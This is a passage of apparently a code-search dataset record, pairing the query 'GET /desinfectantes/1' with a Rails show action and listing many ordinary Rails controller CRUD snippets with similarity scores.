"def show\n @deuda = Deuda.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @deuda }\n end\n end",
"def lista_estoque()\n @client.get(Route.new([ROTA_DID_ESTOQUE]))\n end",
"def desinfectante_params\n params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)\n end",
"def mostrar_demoras\n @demoras= Paciente.find(params[:id]).cuestionario_demoras\n end",
"def index\n logement = Logement.find_by(id:params[:logement_id])\n equipement = logement.equi_securites[0].title\n equipements = logement.equi_securites[0]\n\n render json: {\n securites:equipement,\n fichier:equipements\n }\n end",
"def destroy\n @detalle.destroy\n respond_to do |format|\n format.html { redirect_to detalles_url, notice: 'Detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @detalle = Detalle.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @detalle }\n end\n end",
"def destroy\n @descuento = Descuento.find(params[:id])\n @descuento.destroy\n\n respond_to do |format|\n format.html { redirect_to descuentos_url }\n format.json { head :no_content }\n end\n end",
"def show\n @depoevento = Depoevento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def index\n\n @debtors = Debtor.all\n\n render json: @debtors\n end",
"def destroy\n @detalle = Detalle.find(params[:id])\n @detalle.destroy\n\n respond_to do |format|\n format.html { redirect_to detalles_url }\n format.json { head :no_content }\n end\n end",
"def index\n @enderecos = Endereco.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @enderecos }\n end\n end",
"def index\n @detalles = Detalle.all\n end",
"def index\n @denuncia = Denuncium.all\n\n render json: @denuncia\n end",
"def index\n @despesas = @condominio.despesas\n end",
"def index\n @status_del_admitidos = StatusDelAdmitido.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @status_del_admitidos }\n end\n end",
"def show\n render json: @departamento\n end",
"def destroy\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n @faixa_de_desconto.destroy\n\n respond_to do |format|\n format.html { redirect_to(faixas_de_desconto_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @estado_despacho.destroy\n respond_to do |format|\n format.html { redirect_to estado_despachos_url }\n format.json { head :no_content }\n end\n end",
"def index\n @dossiers = Dossier.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @dossiers }\n end\n end",
"def get_info_to_delete\n\t\tdecision = GovernanceDecision.find(params[:idDec].to_i)\n\t\thijasToDelete = view_context.recursiveDarHijos(decision, [])\n\t\tdetailsToDelete = decision.map_details + view_context.darDetalles(hijasToDelete)\n\t\tfindingsToDelete = decision.findings + view_context.darHallazgos(hijasToDelete)\n\t\tcontent = [decision.description, hijasToDelete.size.to_s, detailsToDelete.size.to_s, findingsToDelete.size.to_s]\n\n\t\trespond_to do |format|\n\t\t\t# ES: Envia el texto:\n\t\t\t# EN: Send the text:\n\t\t\tformat.json {render json: content}\n\t end\n\tend",
"def index\n @notadedebito = Notadedebito.find(params[:notadedebito_id])\n @renglon_nddndcs = @notadedebito.renglon_nddndcs\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @renglon_nddndcs }\n end\n end",
"def index\n @departamentos = Departamento.find(:all)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @departamentos }\n end\n end",
"def index\n @expedientes = Expediente.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @expedientes }\n end\n end",
"def index\n @detalle_facturas = DetalleFactura.all\n end",
"def index\n @interno_unidads = InternoUnidad.all\n render json: @interno_unidads\n end",
"def index\n respond_to do |format|\n format.html\n format.json { render json: SerieDetallesDatatable.new(view_context) }\n end\n end",
"def index\n find_dependencias\n respond_to do |format|\n format.html\n format.json { render :json => @dependencias.to_json(:methods => :alias_or_fullname, :only => [:id, :codigo, :nombre])}\n\n end\n end",
"def destroy\n @desafio.destroy\n respond_to do |format|\n format.html { redirect_to desafios_url, notice: 'Desafio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def index\n @ventas = Venta.order(\"fecha desc\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @ventas }\n end\n end",
"def destroy\n @desire.destroy\n\n respond_to do |format|\n format.html { redirect_to desires_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @informacao_ged.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_ged_url }\n format.json { head :no_content }\n end\n end",
"def lista\n @receitas = Receita.all\n\n respond_to do |format|\n format.html # lista.html.erb\n format.xml { render :xml => @receitas }\n end\n end",
"def destroy\n @inscripcion_diplomado.destroy\n respond_to do |format|\n format.html { redirect_to inscripcion_diplomados_url, notice: 'La inscripción al diplomado fue eliminada correctamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fornecedor.destroy\n addlog(\"Fornecedor apagado\")\n respond_to do |format|\n format.html { redirect_to fornecedores_url, notice: 'Fornecedor apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @deuda = Deuda.find(params[:id])\n @deuda.destroy\n\n respond_to do |format|\n format.html { redirect_to deudas_url }\n format.json { head :no_content }\n end\n end",
"def new\n @depoevento = Depoevento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def index\n @desginations = Desgination.all\n end",
"def index\n @estado_despachos = EstadoDespacho.all\n end",
"def destroy\n @detalle_factura.destroy\n respond_to do |format|\n format.html { redirect_to detalle_facturas_url, notice: 'Detalle factura was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def index\n @mesasredondas = Mesasredonda.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @mesasredondas }\n end\n end",
"def show\n @adicional_desconto = AdicionalDesconto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @adicional_desconto }\n end\n end",
"def new\n @descuento = Descuento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @descuento }\n end\n end",
"def destroy\n @lista_desejo.destroy\n respond_to do |format|\n format.html { redirect_to back_uri, warning: 'Removido da lista de desejos.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n @interventoriasfecha.destroy\n\n respond_to do |format|\n format.html { redirect_to(interventoriasfechas_url) }\n format.xml { head :ok }\n end\n end",
"def show\n @local_deportivo = LocalDeportivo.find(params[:id], :conditions=> \"estado = 'C' OR estado is NULL\")\n \n @espacio_deportivos = @local_deportivo.espacio_deportivos.find(:all)\n \n \n respond_to do |format|\n format.html \n format.json { render json: {:espacio_deportivos =>@espacio_deportivos, :local_deportivo => @local_deportivo }}\n end\n \n end",
"def index\n @attendees = Attendees.all\n render json: @attendees\n end",
"def index\n @unidades = Unidad.find(:all)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @unidades }\n end\n end",
"def destroy\n respond_to do |format|\n if @descuento.destroy\n format.html { redirect_to descuentos_url, notice: 'Descuento fue eliminado exitosamente.' }\n format.json { head :no_content }\n else\n format.html { render :show, notice: 'El Descuento no pudo ser eliminado.' }\n format.json { head :no_content }\n end\n end\n end",
"def new\n @lista_contato = ListaContato.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def destroy\n @informacioncomercial.destroy\n respond_to do |format|\n format.html { redirect_to informacioncomercials_url, notice: 'Informacioncomercial was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @antecedente = Antecedente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @antecedente }\n end\n end",
"def index\n @coleccion = DetallePedido.all\n end",
"def new\n @deuda = Deuda.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deuda }\n end\n end",
"def participantes_desligados(participantes)\n\t\tindexes = participantes_index(participantes,{:status=>\"Desligado\"})\t\n\tend",
"def show\n @lista_contato = ListaContato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def show\n @espacio_deportivo = EspacioDeportivo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @espacio_deportivo }\n end\n end",
"def index\n @peticion_servicio_tis = Peticion::ServicioTi.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @peticion_servicio_tis }\n end\n end",
"def destroy\n @devi.destroy\n respond_to do |format|\n format.html { redirect_to devis_url, notice: \"Le devis a été supprimé.\" }\n format.json { head :no_content }\n end\n end",
"def show\n\n @evento = Evento.find(params[:id])\n @comentarios = Comentario.where(:comentavel_id => @evento.id, :comentavel_type => \"Evento\").order('created_at DESC')\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @evento }\n end\n end",
"def index\n @tipo_despesas = TipoDespesa.all\n end",
"def show\n @unidades = Unidade.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @unidades }\n end\n end",
"def index\n @diciplinas = Diciplina.all\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @diciplinas }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional fue eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def index\n @detalle_ot_presupuestos = DetalleOtPresupuesto.all\n end",
"def det\n\t\t\t@frecuencias['determinantes']\n\t\tend",
"def show\n @estudiante = Estudiante.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estudiante }\n end\n end",
"def destroy\n @interessado.destroy\n respond_to do |format|\n format.html { redirect_to interessados_url }\n format.json { head :no_content }\n end\n end",
"def new\n @detalle = Detalle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @detalle }\n end\n end",
"def index\n @notadedebito = Notadedebito.find(params[:notadecredito_id])\n @renglon_notadebitos = @notadedebito.renglon_notadebitos\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @renglon_notadebitos }\n end\n end",
"def show\n @venta = Venta.find(params[:id])\n\n @domicilios = Domicilio.where(usuario_id: @venta.usuario.id)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @venta }\n end\n end",
"def show\n @departamentos = Departamento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @departamentos }\n end\n end",
"def index\n @pedidos = Pedido.find(:all, :conditions => [\"cliente_id=?\", session[:usuario_id]])\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @pedidos }\n end\n end",
"def index\n seleccionarMenu(:juzgados)\n @juzgados = Juzgado.order(:ciudad_id)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @juzgados }\n end\n end",
"def index\n @dia_eventos = DiaEvento.all\n render json: @dia_eventos\n end",
"def create\n @desinfectante = Desinfectante.new(desinfectante_params)\n\n respond_to do |format|\n if @desinfectante.save\n format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully created.' }\n format.json { render :show, status: :created, location: @desinfectante }\n else\n format.html { render :new }\n format.json { render json: @desinfectante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @calificaciones = Calificacion.order('created_at DESC').all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @calificaciones }\n end\n end",
"def new\n @expediente = Expediente.new\n @municipios = Municipio.all\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @expediente }\n end\n end",
"def destroy\n @ordenes_consumos_detalle.destroy\n respond_to do |format|\n format.html { redirect_to ordenes_consumos_detalles_url, notice: 'Ordenes consumos detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @dependencia = Dependencia.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @dependencia }\n end\n end"
] |
[
"0.64389193",
"0.623495",
"0.61304295",
"0.60649556",
"0.60498655",
"0.6040296",
"0.6034668",
"0.60063785",
"0.59972966",
"0.5948474",
"0.59429896",
"0.59263563",
"0.59120077",
"0.5791583",
"0.5770066",
"0.5764881",
"0.5750057",
"0.57298476",
"0.5708329",
"0.568885",
"0.5684572",
"0.56839097",
"0.56837994",
"0.5669359",
"0.5662162",
"0.5658636",
"0.5651478",
"0.56486064",
"0.56473184",
"0.56461686",
"0.5643427",
"0.5630953",
"0.56269",
"0.5620598",
"0.5606203",
"0.5601379",
"0.55900514",
"0.5586249",
"0.5582011",
"0.5574526",
"0.5571033",
"0.5570386",
"0.55441856",
"0.5541231",
"0.553956",
"0.5537447",
"0.55243194",
"0.5523063",
"0.5521918",
"0.5515866",
"0.55129075",
"0.55063385",
"0.54980755",
"0.5496984",
"0.54951245",
"0.5493369",
"0.54817045",
"0.5479751",
"0.5473034",
"0.546635",
"0.5462105",
"0.5461047",
"0.5461002",
"0.5458767",
"0.5456985",
"0.545401",
"0.5452761",
"0.5450949",
"0.54507583",
"0.54399896",
"0.5436288",
"0.5431933",
"0.54302126",
"0.5429563",
"0.542847",
"0.5426565",
"0.54236835",
"0.54216284",
"0.5419622",
"0.5418953",
"0.54094887",
"0.54089713",
"0.54066485",
"0.54044133",
"0.5404172",
"0.5402918",
"0.5398547",
"0.53943396",
"0.53912264",
"0.5391212",
"0.53896767",
"0.53844196",
"0.53832775",
"0.537922",
"0.53767926",
"0.5372202",
"0.5369039",
"0.5360632",
"0.5360065",
"0.5343876"
] |
0.72310925
|
0
|
GET /desinfectantes/1 GET /desinfectantes/1.json
|
def show
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def index\n @desinfectantes = Desinfectante.all\n end",
"def show\n @descuento = Descuento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @descuento }\n end\n end",
"def show\n @detalle = Detalle.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @detalle }\n end\n end",
"def show\n @deuda = Deuda.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @deuda }\n end\n end",
"def index\n @detalles = Detalle.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @detalles }\n end\n end",
"def show\n @depoevento = Depoevento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def index\n @antecedentes = Antecedente.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @antecedentes }\n end\n end",
"def index\n logement = Logement.find_by(id:params[:logement_id])\n equipement = logement.equi_securites[0].title\n equipements = logement.equi_securites[0]\n\n render json: {\n securites:equipement,\n fichier:equipements\n }\n end",
"def show\n @dependencia = Dependencia.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @dependencia }\n end\n end",
"def show\n @estudiante = Estudiante.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estudiante }\n end\n end",
"def index\n @tipo_denuncia = TipoDenuncium.all\n\n render json: @tipo_denuncia\n end",
"def show\n @lista_contato = ListaContato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def consulta\n fiesta = Fiesta.all\n render json: fiesta\n end",
"def show\n @respuesta = Respuesta.find(params[:id])\n\n render json: @respuesta\n end",
"def show\n @deporte= set_deporte\n render json: @deporte, status: :ok\n\n end",
"def show\n @humanidades2 = Humanidades2.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @humanidades2 }\n end\n end",
"def show\n @fulcliente = Fulcliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @fulcliente }\n end\n end",
"def show\n @ventas_seguimiento = Ventas::Seguimiento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @ventas_seguimiento }\n end\n end",
"def show\n @solicitud_servicio = SolicitudServicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @solicitud_servicio }\n end\n end",
"def findreg\n @detalles = Detalle.find(params[:id])\n render json: @detalles\n end",
"def emergencias_en_curso\n @emergencies = Emergency.where(:estado => 'f')\n render json: @emergencies\n end",
"def show\n @antecedente = Antecedente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @antecedente }\n end\n end",
"def show\n @indicativo = Indicativo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @indicativo }\n end\n end",
"def show\n @venta = Venta.find(params[:id])\n\n @domicilios = Domicilio.where(usuario_id: @venta.usuario.id)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @venta }\n end\n end",
"def index\n @deportes = Deporte.all\n render json: @deportes, status: :ok \n @deportes = Deporte.paginate(:page => params[:page])\n end",
"def show\n @servicio = Servicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @servicio }\n end\n end",
"def show\n @denuncia_tipo = DenunciaTipo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @denuncia_tipo }\n end\n end",
"def show\n @conta = Conta.find(params[:id])\n respond_to do |format|\n format.html { render :show }\n format.json { render json: @conta, :include => {\n :movimentos => {\n :include => [:nota, :pessoa],\n :methods => [:favorecido],\n :except => [:created_at, :updated_at]\n }\n },\n :methods => [:saldo]\n }\n end\n end",
"def show\n @concedente = Concedente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @concedente }\n end\n end",
"def show\n @diemtrentuyen = Diemtrentuyen.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @diemtrentuyen }\n end\n end",
"def show\n @espacio_deportivo = EspacioDeportivo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @espacio_deportivo }\n end\n end",
"def show\n @humanidades1 = Humanidades1.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @humanidades1 }\n end\n end",
"def index\n @departamentos = Departamento.all\n\n render json: @departamentos\n end",
"def show\n @serv_adicionale = ServAdicionale.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @serv_adicionale }\n end\n end",
"def show\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tecnico }\n end\n end",
"def show\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tecnico }\n end\n end",
"def show\n @expediente = Expediente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @expediente }\n end\n end",
"def show\n @respuesta = Respuesta.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @respuesta }\n end\n end",
"def show\n @consulta = Consulta.find(params[:id])\n\n render json: @consulta\n end",
"def show\n @status_del_admitido = StatusDelAdmitido.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @status_del_admitido }\n end\n end",
"def index\n @deporte_usuarios = DeporteUsuario.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @deporte_usuarios }\n end\n end",
"def show\n @calificacion_servicio = CalificacionServicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @calificacion_servicio }\n end\n end",
"def show\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @tecnico }\n end\n end",
"def show\n\n @evento = Evento.find(params[:id])\n @comentarios = Comentario.where(:comentavel_id => @evento.id, :comentavel_type => \"Evento\").order('created_at DESC')\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @evento }\n end\n end",
"def show\n @ejercicio = Ejercicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @ejercicio }\n end\n end",
"def show\n @tipo_convenio = TipoConvenio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_convenio }\n end\n end",
"def index\n @ofertas = Oferta.where(:status_id => Status.find_by_descricao('Ativo'))\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @ofertas }\n end\n end",
"def show\n @status_de_la_inscripcion = StatusDeLaInscripcion.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @status_de_la_inscripcion }\n end\n end",
"def show\n @tipo_atendimento = TipoAtendimento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_atendimento }\n end\n end",
"def show\n @local_deportivo = LocalDeportivo.find(params[:id], :conditions=> \"estado = 'C' OR estado is NULL\")\n \n @espacio_deportivos = @local_deportivo.espacio_deportivos.find(:all)\n \n \n respond_to do |format|\n format.html \n format.json { render json: {:espacio_deportivos =>@espacio_deportivos, :local_deportivo => @local_deportivo }}\n end\n \n end",
"def show\n @comentario = Comentario.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @comentario }\n end\n end",
"def show\n @comentario = Comentario.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @comentario }\n end\n end",
"def show\n render json: @departamento\n end",
"def show\n @etudiant = Etudiant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @etudiant }\n end\n end",
"def show\n @adicional_desconto = AdicionalDesconto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @adicional_desconto }\n end\n end",
"def index\n @ventas = Venta.order(\"fecha desc\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @ventas }\n end\n end",
"def show\n @indicacao = Indicacao.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @indicacao }\n end\n end",
"def show\n @compra_detalle = CompraDetalle.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @compra_detalle }\n end\n end",
"def show\n @sugerencia = Sugerencia.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @sugerencia }\n end\n end",
"def index\n\n if params[:ventas_seguimiento]\n cliente_id = params[:ventas_seguimiento][:cliente_id]\n @ventas_seguimientos = Ventas::Seguimiento.where(\"cliente_id = ?\",cliente_id).order(\"created_at DESC\").paginate(:page => params[:page], :per_page => 5)\n @seguimientos = Ventas::Seguimiento.new(:cliente_id => cliente_id)\n else\n @ventas_seguimientos = Ventas::Seguimiento.order(\"created_at DESC\").paginate(:page => params[:page], :per_page => 5)\n @seguimientos = Ventas::Seguimiento.new\n end\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @ventas_seguimientos }\n end\n end",
"def index\n @detpedidos = Detpedido.all\n end",
"def show\n @sezione = Sezione.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @sezione }\n end\n end",
"def show\n @tipo_negocio = TipoNegocio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_negocio }\n end\n end",
"def destroy\n @desinfectante.destroy\n respond_to do |format|\n format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @sitio_entrega = SitioEntrega.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @sitio_entrega }\n end\n end",
"def index\n find_dependencias\n respond_to do |format|\n format.html\n format.json { render :json => @dependencias.to_json(:methods => :alias_or_fullname, :only => [:id, :codigo, :nombre])}\n\n end\n end",
"def show\n @cliente = Cliente.find(params[:cliente_id])\n @pago = @cliente.pagos.find(params[:id])\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @pago }\n end\n end",
"def show\n @pedido = Pedido.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @pedido }\n end\n end",
"def show\n @veiculo = Veiculo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @veiculo }\n end\n end",
"def show\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @interventoriasfecha }\n end\n end",
"def show\n @movimentacao_de_estoque = MovimentacaoDeEstoque.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @movimentacao_de_estoque }\n end\n end",
"def show\n @leito = Leito.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @leito }\n end\n end",
"def show\n @empresa_servicio = EmpresaServicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @empresa_servicio }\n end\n end",
"def new\n @lista_contato = ListaContato.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def show\n @status_del_tramite_de_beca = StatusDelTramiteDeBeca.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @status_del_tramite_de_beca }\n end\n end",
"def new\n @descuento = Descuento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @descuento }\n end\n end",
"def show\n @estacionamiento = Estacionamiento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estacionamiento }\n end\n end",
"def index\n @status_del_admitidos = StatusDelAdmitido.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @status_del_admitidos }\n end\n end",
"def show\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @faixa_de_desconto }\n end\n end",
"def new\n @detalle = Detalle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @detalle }\n end\n end",
"def show\n @asiento = Asiento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @asiento }\n end\n end",
"def show\n @tipo_contrato = TipoContrato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_contrato }\n end\n end",
"def show\n @excepcion_entrega = ExcepcionEntrega.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @excepcion_entrega }\n end\n end",
"def show\n @liste = Liste.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @liste }\n end\n end",
"def show\n @historial = Historial.find(params[:id])\n @receta = Recete.histori(@historial.id)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @historial }\n end\n end",
"def new\n @deuda = Deuda.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deuda }\n end\n end",
"def index\n @enderecos = Endereco.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @enderecos }\n end\n end",
"def show\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @cliente }\n end\n end",
"def show\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @cliente }\n end\n end",
"def show\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @cliente }\n end\n end",
"def show\n @arquivo = Arquivo.find(params[:id])\n @comentarios = Comentario.where(:comentavel_id => @arquivo.id, :comentavel_type => \"Arquivo\").order('created_at DESC')\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @arquivo }\n end\n end",
"def new\n @servicio = Servicio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @servicio }\n end\n end",
"def show\n @unidades = Unidade.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @unidades }\n end\n end",
"def index\n @pedidos = Pedido.find(:all, :conditions => [\"cliente_id=?\", session[:usuario_id]])\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @pedidos }\n end\n end",
"def show\n @requerimiento ||= Requerimiento.where(:numero => params[:id]).first\n @areas = Area.where(\" nombre like '%DIT%' \")\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @requerimiento }\n end\n end",
"def show\n @ficha = Ficha.find(params[:id])\n \n respond_to do |format| \n format.html # show.html.erb\n format.json { render json: @ficha } \n end\n end",
"def index\n @instituicoes = Instituicao.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @instituicoes }\n end\n end",
"def show\n @receipe = Receipe.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @receipe }\n end\n end",
"def new\n @uf = Uf.first\n @municipios = @uf.municipios\n @cargo_eleicao = Eleicao.find(:first, :conditions => \"status = true\").cargo_eleicaos\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @cargo_eleicao }\n end\n end",
"def show\n @dato = Dato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @dato }\n end\n end",
"def index\n @peticion_servicio_tis = Peticion::ServicioTi.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @peticion_servicio_tis }\n end\n end"
] |
[
"0.69370973",
"0.6734477",
"0.6544041",
"0.64997417",
"0.64963436",
"0.63957137",
"0.6391741",
"0.6373035",
"0.6369591",
"0.63553333",
"0.6354211",
"0.6327558",
"0.63217884",
"0.62959665",
"0.6290628",
"0.6253627",
"0.6242099",
"0.62330043",
"0.6230897",
"0.6227246",
"0.6225376",
"0.622461",
"0.62112516",
"0.62080854",
"0.6206604",
"0.6202283",
"0.6192155",
"0.619071",
"0.6168241",
"0.6165436",
"0.61614007",
"0.6161342",
"0.61589676",
"0.6150791",
"0.61453056",
"0.61453056",
"0.61451536",
"0.614435",
"0.61358446",
"0.6133087",
"0.61318713",
"0.6128917",
"0.61276037",
"0.6120934",
"0.6114496",
"0.6111097",
"0.6104328",
"0.6102033",
"0.60990494",
"0.60868686",
"0.60783255",
"0.60783255",
